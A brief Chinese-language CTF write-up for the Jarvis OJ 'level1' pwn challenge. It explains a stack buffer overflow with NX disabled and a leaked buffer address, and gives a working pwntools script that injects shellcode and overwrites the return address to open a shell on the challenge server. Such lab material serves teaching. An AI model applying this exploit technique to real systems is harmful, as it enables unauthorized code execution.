(Jarvis Oj)(Pwn) level1

(Jarvis Oj)(Pwn) level1

首先用checksec查一下保护。几乎没开什么保护措施。关键的是NX没开，意味着栈上的数据可执行。

用ida反汇编，找到溢出点。

但这次没有找到system函数了，那么该怎么得到shell呢，发现这个函数调用了printf函数，输出了buf的地址，在结合NX保护是关闭的，那么就意味着，如果将shellcode写到buf中，函数返回时跳转到buf位置，就可以执行shellcode了，示意图如下。

写得脚本 。

  1 from pwn import *                                                                                                  
  2 
  3 conn=remote("pwn2.jarvisoj.com","9877")
  4 shellcode_addr=conn.recvuntil('?',drop=True)
  5 shellcode_addr=int(shellcode_addr[12:],16)
  6 pad=0x88
  7 shellcode=asm(shellcraft.sh())
  8 payload=shellcode.ljust(pad,'A')+"BBBB"+p32(shellcode_addr)
  9 conn.sendline(payload)
 10 conn.interactive();